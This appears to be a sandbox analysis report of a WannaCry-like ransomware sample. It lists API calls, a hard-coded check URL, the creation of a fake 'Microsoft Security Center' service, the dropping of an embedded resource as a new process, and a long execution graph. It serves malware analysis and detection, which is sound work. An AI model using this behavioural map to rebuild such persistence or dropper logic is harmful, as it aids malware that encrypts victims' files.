    • __getmainargs.MSVCRT ref: 00409ACB
    • _initterm.MSVCRT ref: 00409ADB
    • GetStartupInfoA.KERNEL32(?), ref: 00409B1A
    • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00409B3E
      • Part of subcall function 00408140: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
      • Part of subcall function 00408140: InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
      • Part of subcall function 00408140: InternetCloseHandle.WININET(00000000), ref: 004081A7
      • Part of subcall function 00408140: InternetCloseHandle.WININET(00000000), ref: 004081AB
      • Part of subcall function 00408140: InternetCloseHandle.WININET(00000000), ref: 004081BC
      • Part of subcall function 00408140: InternetCloseHandle.WININET(00000000), ref: 004081BF
    • exit.MSVCRT ref: 00409B4E
    • _XcptFilter.MSVCRT ref: 00409B60
    Memory Dump Source
    • Source File: 00000000.00000002.1609849577.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1609823698.00400000.00000002.sdmp
    • Associated: 00000000.00000002.1609868461.0040A000.00000002.sdmp
    • Associated: 00000000.00000002.1609889626.0040B000.00000008.sdmp
    • Associated: 00000000.00000002.1609917463.00431000.00000004.sdmp
    • Associated: 00000000.00000002.1610304837.00710000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_mssecsvc.jbxd
    Function 00408140, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 53
    APIs
    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
    • InternetCloseHandle.WININET(00000000), ref: 004081A7
    • InternetCloseHandle.WININET(00000000), ref: 004081AB
      • Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
      • Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5
      • Part of subcall function 00408090: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
      • Part of subcall function 00408090: OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,77181E70,00000000,?,004081B2), ref: 004080DC
      • Part of subcall function 00408090: CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
      • Part of subcall function 00408090: CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
      • Part of subcall function 00408090: StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126
    • InternetCloseHandle.WININET(00000000), ref: 004081BC
    • InternetCloseHandle.WININET(00000000), ref: 004081BF
    Strings
    • http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, xrefs: 0040814A
    Memory Dump Source
    • Source File: 00000000.00000002.1609849577.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1609823698.00400000.00000002.sdmp
    • Associated: 00000000.00000002.1609868461.0040A000.00000002.sdmp
    • Associated: 00000000.00000002.1609889626.0040B000.00000008.sdmp
    • Associated: 00000000.00000002.1609917463.00431000.00000004.sdmp
    • Associated: 00000000.00000002.1610304837.00710000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_mssecsvc.jbxd

    Non-executed Functions

    Function 00407CE0, Relevance: 50.9, APIs: 18, Strings: 11, Instructions: 175
    APIs
    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,77181E70,?,00000000), ref: 00407CEF
    • GetProcAddress.KERNEL32(00000000,CreateProcessA,?,00000000), ref: 00407D0D
    • GetProcAddress.KERNEL32(00000000,CreateFileA,?,00000000), ref: 00407D1A
    • GetProcAddress.KERNEL32(00000000,WriteFile,?,00000000), ref: 00407D27
    • GetProcAddress.KERNEL32(00000000,CloseHandle,?,00000000), ref: 00407D34
    • FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
    • LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
    • LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
    • SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
    • sprintf.MSVCRT ref: 00407E01
    • sprintf.MSVCRT ref: 00407E18
    • MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00407E2C
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000004,00000000), ref: 00407E43
    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00407E61
    • CloseHandle.KERNEL32(00000000), ref: 00407E68
    • CreateProcessA.KERNEL32 ref: 00407EE8
    • CloseHandle.KERNEL32(00000000), ref: 00407EF7
    • CloseHandle.KERNEL32(08000000), ref: 00407F02
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1609849577.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1609823698.00400000.00000002.sdmp
    • Associated: 00000000.00000002.1609868461.0040A000.00000002.sdmp
    • Associated: 00000000.00000002.1609889626.0040B000.00000008.sdmp
    • Associated: 00000000.00000002.1609917463.00431000.00000004.sdmp
    • Associated: 00000000.00000002.1610304837.00710000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_mssecsvc.jbxd
    Function 00407C40, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 54
    APIs
    • sprintf.MSVCRT ref: 00407C56
    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
    • CreateServiceA.ADVAPI32(00000000,mssecsvc2.0,Microsoft Security Center (2.0) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,77181E70,00000000), ref: 00407C9B
    • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
    • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
    • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1609849577.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1609823698.00400000.00000002.sdmp
    • Associated: 00000000.00000002.1609868461.0040A000.00000002.sdmp
    • Associated: 00000000.00000002.1609889626.0040B000.00000008.sdmp
    • Associated: 00000000.00000002.1609917463.00431000.00000004.sdmp
    • Associated: 00000000.00000002.1610304837.00710000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_mssecsvc.jbxd
    Function 00408090, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49
    APIs
    • GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
    • __p___argc.MSVCRT ref: 004080A5
    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
    • OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,77181E70,00000000,?,004081B2), ref: 004080DC
    • CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
      • Part of subcall function 00407FA0: ChangeServiceConfig2A.ADVAPI32(?,00000002,00000000), ref: 00407FF4
    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
    • StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1609849577.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1609823698.00400000.00000002.sdmp
    • Associated: 00000000.00000002.1609868461.0040A000.00000002.sdmp
    • Associated: 00000000.00000002.1609889626.0040B000.00000008.sdmp
    • Associated: 00000000.00000002.1609917463.00431000.00000004.sdmp
    • Associated: 00000000.00000002.1610304837.00710000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_mssecsvc.jbxd
    Function 00407FA0, Relevance: 1.5, APIs: 1, Instructions: 26
    APIs
    • ChangeServiceConfig2A.ADVAPI32(?,00000002,00000000), ref: 00407FF4
    Memory Dump Source
    • Source File: 00000000.00000002.1609849577.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1609823698.00400000.00000002.sdmp
    • Associated: 00000000.00000002.1609868461.0040A000.00000002.sdmp
    • Associated: 00000000.00000002.1609889626.0040B000.00000008.sdmp
    • Associated: 00000000.00000002.1609917463.00431000.00000004.sdmp
    • Associated: 00000000.00000002.1610304837.00710000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_mssecsvc.jbxd

    Analysis Process: tasksche.exe PID: 3216 Parent PID: 3048

    Execution Graph

    Execution Coverage:4.3%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:2.7%
    Total number of Nodes:638
    Total number of Limit Nodes:6

    Graph

    %3 2951 40135e 2952 40137a ctype 4 API calls 2951->2952 2953 401366 2952->2953 2954 40136d ??3@YAXPAX 2953->2954 2955 401374 2953->2955 2954->2955 2973 4017ff 2978 40181b DeleteCriticalSection 2973->2978 2975 401807 2976 40180e ??3@YAXPAX 2975->2976 2977 401815 2975->2977 2976->2977 2978->2975 2979 4056ee free 2980 4021b2 FreeLibrary 2220 4077ba __set_app_type __p__fmode __p__commode 2221 407829 2220->2221 2222 40783d 2221->2222 2223 407831 __setusermatherr 2221->2223 2232 40792a _controlfp 2222->2232 2223->2222 2225 407842 _initterm __getmainargs _initterm 2226 407896 GetStartupInfoA 2225->2226 2228 4078ca GetModuleHandleA 2226->2228 2233 401fe7 GetModuleFileNameA 2228->2233 2232->2225 2271 401225 GetComputerNameW wcslen 2233->2271 2236 40203b __p___argv strcmp 2237 40208e strrchr 2236->2237 2240 402056 2236->2240 2238 4020a5 strrchr 2237->2238 2239 4020b4 SetCurrentDirectoryA 2237->2239 2238->2239 2303 4010fd wcscat 2239->2303 2279 401b5f MultiByteToWideChar GetWindowsDirectoryW swprintf GetFileAttributesW 2240->2279 2246 402061 CopyFileA GetFileAttributesA 2246->2237 2248 402081 2246->2248 2293 401f5d GetFullPathNameA 2248->2293 2252 402086 2252->2237 2253 402165 exit _XcptFilter 2252->2253 2256 401064 6 API calls 2257 4020f2 2256->2257 2340 40170a 2257->2340 2261 402109 2352 401437 2261->2352 2270 402150 2382 40137a 2270->2382 2272 401280 2271->2272 2273 4012a0 srand rand 2271->2273 2274 401286 wcslen 2272->2274 2275 4012c0 rand 2273->2275 2276 4012d6 2273->2276 2274->2273 2274->2274 2275->2275 2275->2276 2277 4012f1 __p___argc 2276->2277 2278 4012dd rand 2276->2278 2277->2236 2277->2237 2278->2276 2280 401c40 swprintf 2279->2280 2281 401c1b 2279->2281 2283 401af6 7 API calls 2280->2283 2390 401af6 CreateDirectoryW SetCurrentDirectoryW 2281->2390 2285 401c6b 2283->2285 2286 401af6 7 API calls 2285->2286 2292 401c38 2285->2292 2287 401c88 2286->2287 2288 401c8f GetTempPathW wcsrchr 2287->2288 2287->2292 2289 401cb4 wcsrchr 2288->2289 2290 401cc5 2288->2290 2289->2290 2291 401af6 7 API calls 2290->2291 2291->2292 2292->2237 2292->2246 2395 401ce8 OpenSCManagerA 2293->2395 2297 401064 6 API calls 2298 401fcb 2297->2298 2300 401fd9 2298->2300 2302 401eff 4 API calls 2298->2302 2299 401fb6 2299->2297 2301 401fde 2299->2301 2300->2252 2300->2301 2301->2252 2302->2300 2304 40115c 2303->2304 2305 40117a RegCreateKeyW 2304->2305 2306 40121a 2304->2306 2307 40118e GetCurrentDirectoryA strlen RegSetValueExA 2304->2307 2308 4011cc RegQueryValueExA 2304->2308 2305->2304 2311 401dab FindResourceA 2306->2311 2309 401200 RegCloseKey 2307->2309 2308->2309 2310 4011f3 SetCurrentDirectoryA 2308->2310 2309->2304 2309->2306 2310->2309 2312 401dcf LoadResource 2311->2312 2322 401e07 2311->2322 2313 401ddd LockResource 2312->2313 2312->2322 2314 401dea SizeofResource 2313->2314 2313->2322 2408 4075ad 2314->2408 2318 401e32 2319 401e8f 2318->2319 2321 4075c4 19 API calls 2318->2321 2415 40763d 2318->2415 2418 407656 2319->2418 2323 401e4f strcmp 2321->2323 2326 401e9e 2322->2326 2323->2318 2324 401e67 GetFileAttributesA 2323->2324 2324->2318 2787 401000 2326->2787 2329 401efa 2332 401064 CreateProcessA 2329->2332 2330 401ed0 rand strcpy 2331 401000 4 API calls 2330->2331 2331->2329 2333 4010b2 2332->2333 2336 4010f7 2332->2336 2334 4010b7 WaitForSingleObject 2333->2334 2335 4010e3 CloseHandle CloseHandle 2333->2335 2337 4010d2 2334->2337 2338 4010c7 TerminateProcess 2334->2338 2335->2336 2336->2256 2337->2335 2339 4010d7 GetExitCodeProcess 2337->2339 2338->2337 2339->2335 2796 401a45 2340->2796 2343 401727 LoadLibraryA 2344 4017a7 2343->2344 2345 40173c 7 API calls 2343->2345 2344->2253 2346 4012fd 2344->2346 2345->2344 2347 401307 __EH_prolog 2346->2347 2800 4017dd InitializeCriticalSection 2347->2800 2349 401317 2801 4017dd InitializeCriticalSection 2349->2801 2351 401324 2351->2261 2802 401861 2352->2802 2355 40145d GlobalAlloc 2356 401476 GlobalAlloc 2355->2356 2358 401485 2355->2358 2356->2358 2357 401861 6 API calls 2357->2355 2358->2270 2359 4014a6 CreateFileA 2358->2359 2360 401524 GetFileSizeEx 2359->2360 2361 4016d0 _local_unwind2 2359->2361 2360->2361 2363 401538 2360->2363 2362 4016f9 2361->2362 2362->2270 2373 4021bd 2362->2373 2363->2361 2364 401564 memcmp 2363->2364 2364->2361 2365 401582 2364->2365 2365->2361 2820 4019e1 2365->2820 2370 40167a 2370->2361 2834 403a77 2370->2834 2372 4016c5 2372->2361 2881 4021e9 2373->2881 2376 402924 2377 4029a5 SetLastError 2376->2377 2381 402940 2376->2381 2378 4029af 2377->2378 2378->2270 2379 40295c 2379->2377 2379->2378 2380 402981 _stricmp 2380->2379 2380->2381 2381->2377 2381->2379 2381->2380 2383 401384 __EH_prolog 2382->2383 2940 4013ce 2383->2940 2385 40139d ctype 2949 40181b DeleteCriticalSection 2385->2949 2387 4013b5 2950 40181b DeleteCriticalSection 2387->2950 2389 4013c1 2389->2253 2391 401b18 CreateDirectoryW SetCurrentDirectoryW 2390->2391 2392 401b27 2390->2392 2391->2392 2393 401b2b GetFileAttributesW SetFileAttributesW 2391->2393 2392->2280 2392->2292 2393->2392 2394 401b42 swprintf 2393->2394 2394->2392 2396 401d12 OpenServiceA 2395->2396 2399 401d0b 2395->2399 2397 401d45 sprintf CreateServiceA 2396->2397 2398 401d2e StartServiceA CloseServiceHandle 2396->2398 2400 401d98 2397->2400 2401 401d81 StartServiceA CloseServiceHandle 2397->2401 2402 401d9b CloseServiceHandle 2398->2402 2399->2299 2403 401eff sprintf 2399->2403 2400->2402 2401->2400 2402->2399 2404 401f26 OpenMutexA 2403->2404 2405 401f4c 2403->2405 2406 401f51 CloseHandle 2404->2406 2407 401f3b Sleep 2404->2407 2405->2299 2406->2405 2407->2404 2407->2405 2426 4074a4 2408->2426 2411 4075c4 2412 4075dd 2411->2412 2413 4075e4 2411->2413 2412->2318 2413->2412 2593 406c40 2413->2593 2667 407603 2415->2667 2419 40765f 2418->2419 2420 407666 2418->2420 2419->2322 2420->2419 2774 40747b 2420->2774 2423 407699 ??3@YAXPAX 2423->2322 2424 407572 2 API calls 2425 407692 ??3@YAXPAX 2424->2425 2425->2423 2439 4076c8 2426->2439 2428 4074ae ??2@YAPAXI 2429 4074c8 2428->2429 2430 4074d0 2428->2430 2440 407527 2429->2440 2443 406b8e 2430->2443 2434 407509 ??2@YAPAXI 2436 401dfe 2434->2436 2435 4074f3 2435->2436 2455 407572 2435->2455 2436->2322 2436->2411 2439->2428 2441 40754e strlen ??2@YAPAXI strcpy 2440->2441 2442 40756b 2440->2442 2441->2442 2442->2430 2444 406bf9 2443->2444 2445 406b9e 2443->2445 2444->2434 2444->2435 2445->2444 2446 406ba8 GetCurrentDirectoryA strlen 2445->2446 2447 406bcd 2446->2447 2448 406bde 2446->2448 2447->2448 2451 406bd1 strcat 2447->2451 2449 406c00 2448->2449 2450 406be5 SetFilePointer 2448->2450 2460 405bae 2449->2460 2450->2444 2450->2449 2451->2448 2456 40758d 2455->2456 2457 407586 ??3@YAXPAX 2455->2457 2458 4075a0 ??3@YAXPAX 2456->2458 2459 4074fe ??3@YAXPAX 2456->2459 2457->2456 2458->2459 2459->2436 2461 405bbd 2460->2461 2463 405c36 ??2@YAPAXI 2461->2463 2464 405beb CreateFileA 2461->2464 2466 405c18 SetFilePointer 2461->2466 2467 405bc7 2461->2467 2465 405c46 2463->2465 2464->2466 2464->2467 2465->2467 2468 405c85 SetFilePointer 2465->2468 2466->2463 2467->2444 2469 405fe2 2467->2469 2468->2467 2471 405ff9 2469->2471 2474 406118 2469->2474 2470 406112 2526 405c9f 2470->2526 2471->2470 2496 405edf 2471->2496 2474->2444 2482 405e27 2 API calls 2483 406060 2482->2483 2484 405e27 2 API calls 2483->2484 2485 406076 2484->2485 2486 405e27 2 API calls 2485->2486 2487 406089 2486->2487 2488 405e6b 2 API calls 2487->2488 2489 4060ba 2488->2489 2490 405e6b 2 API calls 2489->2490 2491 4060cd 2490->2491 2492 405e27 2 API calls 2491->2492 2493 4060e3 2492->2493 2493->2470 2494 40611d malloc 2493->2494 2531 4064e2 2494->2531 2497 405d0e SetFilePointer 2496->2497 2498 405ef3 2497->2498 2499 405f2a 2498->2499 2535 405cdd 2498->2535 2508 405d0e 2499->2508 2501 405f02 malloc 2501->2499 2507 405f32 2501->2507 2503 405fd3 free 2503->2499 2504 405d0e SetFilePointer 2504->2507 2505 405fd2 2505->2503 2507->2503 2507->2504 2507->2505 2539 405d8a 2507->2539 2509 405d52 2508->2509 2511 405d1c 2508->2511 2512 405e6b 2509->2512 2510 405d47 SetFilePointer 2510->2509 2511->2509 2511->2510 2544 405def 2512->2544 2514 405e7d 2515 405def 2 API calls 2514->2515 2516 405e90 2514->2516 2515->2516 2517 405ea8 2516->2517 2519 405def 2 API calls 2516->2519 2518 405ec0 2517->2518 2520 405def 2 API calls 2517->2520 2521 405e27 2518->2521 2519->2517 2520->2518 2522 405def 2 API calls 2521->2522 2523 405e38 2522->2523 2524 405def 2 API calls 2523->2524 2525 405e4d 2523->2525 2524->2525 2525->2482 2527 405ca8 2526->2527 2528 405cad 2526->2528 2527->2474 2529 405cbc ??3@YAXPAX 2528->2529 2530 405cb3 CloseHandle 2528->2530 2529->2474 2530->2529 2532 4064f3 2531->2532 2534 4064ee 2531->2534 2547 4061e0 2532->2547 2534->2474 2536 405cea 2535->2536 2538 405d01 2535->2538 2537 405cef SetFilePointer 2536->2537 2536->2538 2537->2501 2538->2501 2540 405d9e ReadFile 2539->2540 2541 405dbe memcpy 2539->2541 2543 405db5 2540->2543 2541->2543 2543->2507 2545 405d8a 2 API calls 2544->2545 2546 405e03 2545->2546 2546->2514 2548 4061fc 2547->2548 2584 4061f4 2547->2584 2549 405d0e SetFilePointer 2548->2549 2550 40620c 2549->2550 2551 406213 2550->2551 2552 405e6b 2 API calls 2550->2552 2553 405e27 2 API calls 2551->2553 2552->2551 2554 406250 2553->2554 2555 405e27 2 API calls 2554->2555 2556 406264 2555->2556 2557 405e27 2 API calls 2556->2557 2558 406278 2557->2558 2559 405e27 2 API calls 2558->2559 2560 40628c 2559->2560 2561 405e6b 2 API calls 2560->2561 2562 4062a0 2561->2562 2563 405e6b 2 API calls 2562->2563 2564 4062c0 2563->2564 2565 405e6b 2 API calls 2564->2565 2566 4062d5 2565->2566 2567 405e6b 2 API calls 2566->2567 2568 4062e9 2567->2568 2569 405e27 2 API calls 2568->2569 2570 4062fd 2569->2570 2571 405e27 2 API calls 2570->2571 2572 406311 2571->2572 2573 405e27 2 API calls 2572->2573 2574 406325 2573->2574 2575 405e27 2 API calls 2574->2575 2576 406339 2575->2576 2577 405e27 2 API calls 2576->2577 2578 40634d 2577->2578 2579 405e6b 2 API calls 2578->2579 2580 406361 2579->2580 2581 405e6b 2 API calls 2580->2581 2582 406375 2581->2582 2583 40641e 2582->2583 2585 4063be 2582->2585 2588 405d8a 2 API calls 2582->2588 2583->2584 2586 406464 2583->2586 2589 405d0e SetFilePointer 2583->2589 2584->2534 2585->2583 2587 405d0e SetFilePointer 2585->2587 2591 4063f6 2585->2591 2586->2584 2592 405d8a 2 API calls 2586->2592 2587->2591 2588->2585 2589->2586 2590 405d8a 2 API calls 2590->2583 2591->2583 2591->2590 2592->2584 2594 406c5f 2593->2594 2598 406ca2 2593->2598 2595 406c75 2594->2595 2594->2598 2630 406a97 2594->2630 2597 406c81 2595->2597 2600 406c9e 2595->2600 2597->2598 2599 406c85 memcpy 2597->2599 2598->2412 2599->2598 2600->2598 2601 406cf9 2600->2601 2603 4064e2 3 API calls 2600->2603 2602 406d09 2601->2602 2636 406520 2601->2636 2640 4064bb 2602->2640 2603->2601 2609 405d0e SetFilePointer 2610 406d57 2609->2610 2610->2598 2611 406d5e ??2@YAPAXI 2610->2611 2612 405d8a 2 API calls 2611->2612 2613 406d78 2612->2613 2614 406d80 ??3@YAXPAX 2613->2614 2615 406d93 strcpy 2613->2615 2614->2598 2616 406dbe _mbsstr 2615->2616 2618 406de7 _mbsstr 2616->2618 2618->2616 2619 406df5 _mbsstr 2618->2619 2619->2616 2620 406e03 _mbsstr 2619->2620 2620->2616 2621 406e16 strcpy 2620->2621 2622 406e48 2621->2622 2666 406b23 SystemTimeToFileTime 2622->2666 2624 406ee5 LocalFileTimeToFileTime 2625 406f32 strcmp 2624->2625 2628 406f6e 2624->2628 2625->2628 2629 406f5f 2625->2629 2626 40703b ??3@YAXPAX 2627 407042 memcpy 2626->2627 2627->2598 2628->2626 2628->2627 2629->2625 2629->2628 2631 406ab0 2630->2631 2634 406aa9 2630->2634 2631->2595 2632 406ad7 free 2633 406add 2632->2633 2635 406aee free 2633->2635 2634->2631 2634->2632 2634->2633 2635->2631 2637 40652c 2636->2637 2638 406530 2636->2638 2637->2601 2638->2637 2639 4061e0 3 API calls 2638->2639 2639->2637 2641 4061e0 3 API calls 2640->2641 2642 4064dd 2641->2642 2643 40657a 2642->2643 2644 405d0e SetFilePointer 2643->2644 2645 4065a6 2644->2645 2646 4065ad 2645->2646 2647 405e6b 2 API calls 2645->2647 2646->2598 2646->2609 2648 4065c0 2647->2648 2649 405e27 2 API calls 2648->2649 2650 4065e2 2649->2650 2651 405e27 2 API calls 2650->2651 2652 4065f6 2651->2652 2653 405e27 2 API calls 2652->2653 2654 40660a 2653->2654 2655 405e6b 2 API calls 2654->2655 2656 406638 2655->2656 2657 405e6b 2 API calls 2656->2657 2658 40664c 2657->2658 2659 405e6b 2 API calls 2658->2659 2660 406677 2659->2660 2661 405e6b 2 API calls 2660->2661 2662 4066a2 2661->2662 2663 405e27 2 API calls 2662->2663 2665 4066cd 2663->2665 2664 405e27 2 API calls 2664->2646 2665->2664 2666->2624 2668 407614 2667->2668 2669 40760d 2667->2669 2668->2669 2671 407136 2668->2671 2669->2318 2672 40714c 2671->2672 2673 407168 2671->2673 2676 40721d 2672->2676 2679 406a97 2 API calls 2672->2679 2687 40715e 2672->2687 2675 40717e 2673->2675 2678 406a97 2 API calls 2673->2678 2692 4071b2 2673->2692 2680 4064e2 3 API calls 2675->2680 2675->2687 2693 407195 2675->2693 2684 4064e2 3 API calls 2676->2684 2676->2687 2691 40723b 2676->2691 2678->2675 2679->2676 2680->2693 2681 4071a5 2718 40671d 2681->2718 2682 40724b 2685 406c40 19 API calls 2682->2685 2683 406a97 2 API calls 2683->2687 2684->2691 2690 40725a 2685->2690 2686 406520 3 API calls 2686->2691 2687->2669 2688 406520 3 API calls 2688->2693 2695 40729c 2690->2695 2697 407263 2690->2697 2691->2682 2691->2686 2728 406880 2692->2728 2693->2681 2693->2688 2694 4072a1 2694->2687 2698 40671d 8 API calls 2694->2698 2695->2694 2696 4072c7 strcpy 2695->2696 2700 4072da 2696->2700 2702 407343 2696->2702 2697->2687 2734 407070 2697->2734 2701 4073b8 2698->2701 2704 4072e1 wsprintfA 2700->2704 2705 4073c8 ??2@YAPAXI 2701->2705 2711 4073d5 2701->2711 2703 40737b wsprintfA 2702->2703 2702->2704 2707 407070 7 API calls 2703->2707 2706 407070 7 API calls 2704->2706 2705->2711 2708 40730f CreateFileA 2706->2708 2707->2708 2708->2694 2710 406880 6 API calls 2710->2711 2711->2710 2712 407421 2711->2712 2715 4073fb WriteFile 2711->2715 2717 40743c SetFileTime 2711->2717 2713 407460 CloseHandle 2712->2713 2714 407469 2712->2714 2713->2714 2716 406a97 2 API calls 2714->2716 2715->2711 2715->2712 2716->2687 2717->2712 2719 406733 2718->2719 2727 40672f 2718->2727 2720 406a97 2 API calls 2719->2720 2722 406743 2719->2722 2719->2727 2720->2722 2721 40657a 3 API calls 2723 406756 2721->2723 2722->2721 2724 406761 malloc 2723->2724 2723->2727 2725 406773 malloc 2724->2725 2724->2727 2726 406794 free 2725->2726 2725->2727 2726->2727 2727->2692 2731 406897 2728->2731 2729 405d0e SetFilePointer 2729->2731 2731->2729 2731->2731 2732 405d8a 2 API calls 2731->2732 2733 4068a0 2731->2733 2744 40583c 2731->2744 2732->2731 2733->2683 2733->2687 2735 407082 GetFileAttributesA 2734->2735 2736 407097 2734->2736 2735->2736 2738 40708e CreateDirectoryA 2735->2738 2737 407132 2736->2737 2739 4070e4 2736->2739 2740 4070bf memcpy 2736->2740 2737->2687 2738->2736 2741 4070f3 strcpy 2739->2741 2742 407102 strcat GetFileAttributesA 2739->2742 2740->2739 2741->2742 2742->2737 2743 407123 CreateDirectoryA 2742->2743 2743->2737 2746 405a87 2744->2746 2747 40584d 2744->2747 2746->2731 2747->2746 2748 4043b6 2747->2748 2758 4043e6 2748->2758 2749 403bd6 2 API calls 2750 4049ec 2749->2750 2750->2747 2751 4045f6 memcpy 2752 40461c 2751->2752 2751->2758 2752->2747 2754 4049c2 2754->2749 2755 404a94 2757 403bd6 2 API calls 2755->2757 2757->2750 2758->2751 2758->2752 2758->2754 2758->2755 2759 404b44 2758->2759 2761 403bd6 2758->2761 2767 403cfc 2758->2767 2760 403bd6 2 API calls 2759->2760 2760->2754 2762 403bf6 2761->2762 2763 403c35 memcpy 2762->2763 2765 403c4a 2762->2765 2763->2765 2764 403cb4 2764->2758 2765->2764 2766 403c9f memcpy 2765->2766 2766->2764 2773 403d2f 2767->2773 2768 403bd6 2 API calls 2770 40427f 2768->2770 2769 403f69 2769->2768 2771 403f71 2769->2771 2770->2758 2771->2758 2772 403bd6 memcpy memcpy 2772->2773 2773->2769 2773->2771 2773->2772 2775 407484 2774->2775 2778 40748b 2774->2778 2776 406a97 2 API calls 2775->2776 2776->2778 2777 40749c 2777->2423 2777->2424 2778->2777 2780 406162 2778->2780 2781 40616b 2780->2781 2782 406170 2780->2782 2781->2777 2784 406a97 2 API calls 2782->2784 2786 40617c 2782->2786 2783 405c9f 2 API calls 2785 406184 free 2783->2785 2784->2786 2785->2777 2786->2783 2788 40100a fopen 2787->2788 2790 40102d 2788->2790 2791 401029 2788->2791 2792 40103f fread 2790->2792 2793 401047 fwrite 2790->2793 2791->2329 2791->2330 2794 40104d fclose 2792->2794 2793->2794 2794->2791 2797 401a55 LoadLibraryA 2796->2797 2799 401711 2796->2799 2798 401a6a 6 API calls 2797->2798 2797->2799 2798->2799 2799->2343 2799->2344 2800->2349 2801->2351 2804 401869 2802->2804 2803 401875 2806 401448 2803->2806 2816 4018b9 2803->2816 2804->2803 2808 4018f9 CreateFileA 2804->2808 2806->2355 2806->2357 2806->2358 2809 401948 GetFileSize 2808->2809 2810 4019a0 _local_unwind2 2808->2810 2809->2810 2811 40195a 2809->2811 2812 4019d2 2810->2812 2811->2810 2813 401962 GlobalAlloc 2811->2813 2812->2803 2813->2810 2814 401973 ReadFile 2813->2814 2814->2810 2815 401987 2814->2815 2815->2810 2817 4018c3 2816->2817 2818 4018e7 CryptReleaseContext 2817->2818 2819 4018f4 2817->2819 2818->2819 2819->2806 2821 401642 2820->2821 2822 4019ee EnterCriticalSection 2820->2822 2821->2361 2826 402a76 2821->2826 2823 401a0e 2822->2823 2824 401a1d LeaveCriticalSection memcpy 2823->2824 2825 401a13 LeaveCriticalSection 2823->2825 2824->2821 2825->2821 2827 402a87 ??0exception@@QAE@ABQBD _CxxThrowException 2826->2827 2828 402aa9 2826->2828 2827->2828 2830 402ae1 2828->2830 2831 402abf ??0exception@@QAE@ABQBD _CxxThrowException 2828->2831 2829 402b13 memcpy memcpy 2833 401666 GlobalAlloc 2829->2833 2830->2829 2832 402af1 ??0exception@@QAE@ABQBD _CxxThrowException 2830->2832 2831->2830 2832->2829 2833->2361 2833->2370 2835 403aa5 2834->2835 2836 403a89 ??0exception@@QAE@ABQBD _CxxThrowException 2834->2836 2837 403bba ??0exception@@QAE@ABQBD _CxxThrowException 2835->2837 2838 403ac2 2835->2838 2836->2835 2842 403bd6 2837->2842 2839 403b28 2838->2839 2843 403ac8 2838->2843 2840 403b3a 2839->2840 2847 403b8b 2839->2847 2850 403b21 2840->2850 2851 403a28 2 API calls 2840->2851 2867 40350f 2840->2867 2848 403c35 memcpy 2842->2848 2854 403c4a 2842->2854 2843->2850 2856 403797 2843->2856 2864 403a28 2843->2864 2845 403797 5 API calls 2845->2847 2847->2845 2847->2850 2848->2854 2850->2372 2853 403b5a memcpy 2851->2853 2852 403cb4 2852->2372 2853->2840 2853->2850 2854->2852 2855 403c9f memcpy 2854->2855 2855->2852 2857 4037a8 ??0exception@@QAE@ABQBD _CxxThrowException 2856->2857 2858 4037c4 2856->2858 